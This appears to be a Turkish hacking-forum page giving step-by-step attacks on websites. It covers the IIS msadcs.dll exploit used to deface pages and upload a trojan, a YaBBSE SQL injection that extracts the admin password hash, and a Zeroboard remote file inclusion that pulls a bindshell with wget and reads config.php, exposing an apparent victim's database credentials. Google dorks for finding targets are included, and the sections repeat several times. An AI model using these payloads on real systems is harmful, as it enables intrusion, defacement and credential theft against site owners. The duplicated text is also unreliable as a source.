selimmaltinbas
  Site Hackerleme
 

WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM

ÖNCELİKLER EMEĞE SAYGI ARKADAŞLAR


sitenin sonuna su kodu ekliyorsunuz 
Kod: 
/cgi-bin/emailme 
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele. 
örnek : 
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1} 
username {falan} 
password{falan} 
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin. 
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- ) 
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini 
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir 
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği 
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım 
artık gerisi size kalmış.

Araclar 
------------ Whisker =>>http://www.wiretrip.net/rfp) 
Msadcs2.pl =>>http://www.wiretrip.net/rfp) 
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl) 
------------ 
I.yol 
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari 
yaziyoruz.. 
c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl whisker.pl -h 
yaziyoruz ve sansliysak asagidaki 
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir. 
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra 
dos'a geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc2.pl -h 
yaziyoruz. 
Sonra bir bakiyoruz... 
Hostname:kurban.com 
Server:IIS X.X 
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu 
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için 
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi 
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz 
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin 
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip 
yaziyoruz bir bakiyoruz Hacked by 133t.. 
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu 
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan 
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde 
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile 
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan 
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a 
geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc-trojan.pl 
localip trojan.exe yaziyoruz. 
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to 
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- ) 
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol. 
2- herhangi bir topici sec 
3- herhangi bir mesaji sec 
4- internet explorer, view den "kaynak"ı sec. bul de 
sesc diye arattir ve yanindaki 32 basamakli session id yi al. 
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya; 
6- onu su sekilde yaz 
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs.. 
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion) 
- explorer (vede biraz sabır) 
AÇIĞIN BULUNMASI


ilk önce 
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.


allinurl: /zboard/zboard.php

daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek: 
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor

2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686 
i686 i386 GNU/Linux 
/home/juotte/www/bbs/include 
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde : 
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz. 
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp; 
wget BindshellinOlduğuSite.com/bindshell 
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell 
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz. 
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için : 
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php


localhost 
juotte <-------------- - user 
juotte7034 <--------------- password 
juotte 
?>

goruldugu gibi user ve password karşımızda 
daha sonra FTP den user ve pass ile baglanabiliriz. 
genelde aynı oluyor. ama tabi tutmayabilir....... 
Yoksa mysqlden bağlanıyoruz....1- ) 
sitenin sonuna su kodu ekliyorsunuz 
Kod: 
/cgi-bin/emailme 
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele. 
örnek : 
bu adreslerde de işe yarıyor 
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1} 
username {falan} 
password{falan} 
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin. 
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- ) 
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini 
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir 
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği 
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım 
artık gerisi size kalmış.

Araclar 
------------ Whisker =>>http://www.wiretrip.net/rfp) 
Msadcs2.pl =>>http://www.wiretrip.net/rfp) 
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl) 
------------ 
I.yol 
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari 
yaziyoruz.. 
c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl whisker.pl -h

yaziyoruz ve sansliysak asagidaki 
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir. 
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra 
dos'a geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc2.pl -h 
Only registred user can see link on this forum! 
Registred or Login on forum!

yaziyoruz. 
Sonra bir bakiyoruz... 
Hostname:kurban.com 
Server:IIS X.X 
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu 
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için 
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi 
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz 
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin 
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip

yaziyoruz bir bakiyoruz Hacked by 133t.. 
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu 
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan 
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde 
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile 
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan 
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a 
geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc-trojan.pl

localip trojan.exe yaziyoruz. 
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to 
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- ) 
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol. 
2- herhangi bir topici sec 
3- herhangi bir mesaji sec 
4- internet explorer, view den "kaynak"ı sec. bul de 
sesc diye arattir ve yanindaki 32 basamakli session id yi al. 
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya;

6- onu su sekilde yaz;

e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs.. 
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion) 
- explorer (vede biraz sabır) 
AÇIĞIN BULUNMASI 
ilk önce 
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz. 
allinurl: /zboard/zboard.php 
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor

Linux

2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686 
i686 i386 GNU/Linux 
/home/juotte/www/bbs/include 
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde : 
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp; 
wget BindshellinOlduğuSite.com/bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz. 
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için :

write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php

localhost 
juotte <-------------- - user 
juotte7034 <--------------- password 
juotte 
?>

goruldugu gibi user ve password karşımızda 
daha sonra FTP den user ve pass ile baglanabiliriz. 
genelde aynı oluyor. ama tabi tutmayabilir....... 
Yoksa mysqlden bağlanıyoruz....1- ) 
sitenin sonuna su kodu ekliyorsunuz 
Kod: 
/cgi-bin/emailme 
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele. 
örnek : 
bu adreslerde de işe yarıyor

2- ) 
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1} 
username {falan} 
password{falan} 
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.

burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- ) 
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini 
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir 
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği 
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım 
artık gerisi size kalmış.

Araclar 
------------ Whisker =>>http://www.wiretrip.net/rfp) 
Msadcs2.pl =>>http://www.wiretrip.net/rfp) 
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl) 
------------ 
I.yol 
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari 
yaziyoruz.. 
c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl whisker.pl -h

yaziyoruz ve sansliysak asagidaki 
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir. 
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra 
dos'a geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc2.pl -h 
yaziyoruz. 
Sonra bir bakiyoruz... 
Hostname:kurban.com 
Server:IIS X.X 
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu 
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için 
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi 
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz 
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin 
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip

yaziyoruz bir bakiyoruz Hacked by 133t.. 
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu 
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan 
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde 
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile 
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan 
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a 
geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc-trojan.pl

localip trojan.exe yaziyoruz. 
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to 
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- ) 
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol. 
2- herhangi bir topici sec 
3- herhangi bir mesaji sec 
4- internet explorer, view den "kaynak"ı sec. bul de 
sesc diye arattir ve yanindaki 32 basamakli session id yi al. 
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya; 
6- onu su sekilde yaz;

e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs.. 
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion) 
- explorer (vede biraz sabır) 
AÇIĞIN BULUNMASI

de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.


allinurl: /zboard/zboard.php

daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor

2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686 
i686 i386 GNU/Linux 
/home/juotte/www/bbs/include 
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde :

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp; 
wget BindshellinOlduğuSite.com/bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz. 
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için :

write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php


localhost 
juotte <-------------- - user 
juotte7034 <--------------- password 
juotte 
?>

goruldugu gibi user ve password karşımızda 
daha sonra FTP den user ve pass ile baglanabiliriz. 
genelde aynı oluyor. ama tabi tutmayabilir....... 
Yoksa mysqlden bağlanıyoruz....1- ) 
sitenin sonuna su kodu ekliyorsunuz 
Kod: 
/cgi-bin/emailme 
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele. 
örnek :

bu adreslerde de işe yarıyor

2- ) 
google dan fullxml diye aratin

daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza

CDATA {1} 
username {falan} 
password{falan} 
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.

orn: 
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.

3- ) 
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini 
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir 
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği 
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım 
artık gerisi size kalmış.

Araclar 
------------ Whisker =>>http://www.wiretrip.net/rfp) 
Msadcs2.pl =>>http://www.wiretrip.net/rfp) 
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl) 
------------ 
I.yol 
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari 
yaziyoruz.. 
c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl whisker.pl -h 
yaziyoruz ve sansliysak asagidaki 
sonuçlari veriyor...

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll


tamam sistemde msadcs.dll açigi var demektir. 
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra 
dos'a geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc2.pl -h

yaziyoruz. 
Sonra bir bakiyoruz... 
Hostname:kurban.com 
Server:IIS X.X 
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu 
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için 
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi 
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz 
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin 
tuttuğunu varsayıyorum ve

cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm

buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip 
yaziyoruz bir bakiyoruz Hacked by 133t.. 
Hepinize basarilar

II.yol

Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu 
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan 
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde 
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile 
taradiniz ve asagidaki sonuçlari verdi:

+200 GET /scripts/tools/newdsn.exe 
+200 HEAD /msadc/msadcs.dll

msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan 
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a 
geçip

c: Windows>cd.. 
c: cd perl 
c: perl>cd bin 
c: PerlBin>perl msadc-trojan.pl

localip trojan.exe yaziyoruz. 
Daha sonra söyle bir mesaj verecek

"done. uploaded and ran If all went well, you should be able to use the trojan to 
connect"

Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...

4- ) 
yabbse forumları nasıl hacklenir diye soranlara;

bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.

1- foruma register ol. 
2- herhangi bir topici sec 
3- herhangi bir mesaji sec 
4- internet explorer, view den "kaynak"ı sec. bul de 
sesc diye arattir ve yanindaki 32 basamakli session id yi al. 
ornegin:13a478d8aa161c2231e6d3b36b6d19f2

5- urln normalde buna benzer bisey ya;

6- onu su sekilde yaz;

e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

oradaki secs senin biraz once buldugun secs.. 
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.

EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.

NOT:eğer bir sorunu olan varsa forumda cevaplarım


5- ) ZEROBOARD AÇIĞI

GEREKLİ ARACLAR : - matrix.txt (remote file inclusion) 
- explorer (vede biraz sabır) 
AÇIĞIN BULUNMASI


ilk önce de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.


allinurl: /zboard/zboard.php

daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:

/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id

ve ............ ekrana bilgiler dökülüyor


2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686 
i686 i386 GNU/Linux 
/home/juotte/www/bbs/include 
uid=99(nobody) gid=99(nobody) groups=99(nobody)


daha sonra sayafaya imzamızı atıyoruz....

oda bu şekilde :


/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html


eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.


/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp; 
wget BindshellinOlduğuSite.com/bindshell

/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell 
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell

ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz. 
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.

config.php yı goruntulemek için : 
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php 
localhost 
juotte <-------------- - user 
juotte7034 <--------------- password 
juotte 
?> 
goruldugu gibi user ve password karşımızda 
daha sonra FTP den user ve pass ile baglanabiliriz. 
genelde aynı oluyor. ama tabi tutmayabilir....... 
Yoksa mysqlden bağlanıyoruz..../Link
 
  Bugün 13 ziyaretçikişi burdaydı!  
 
=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=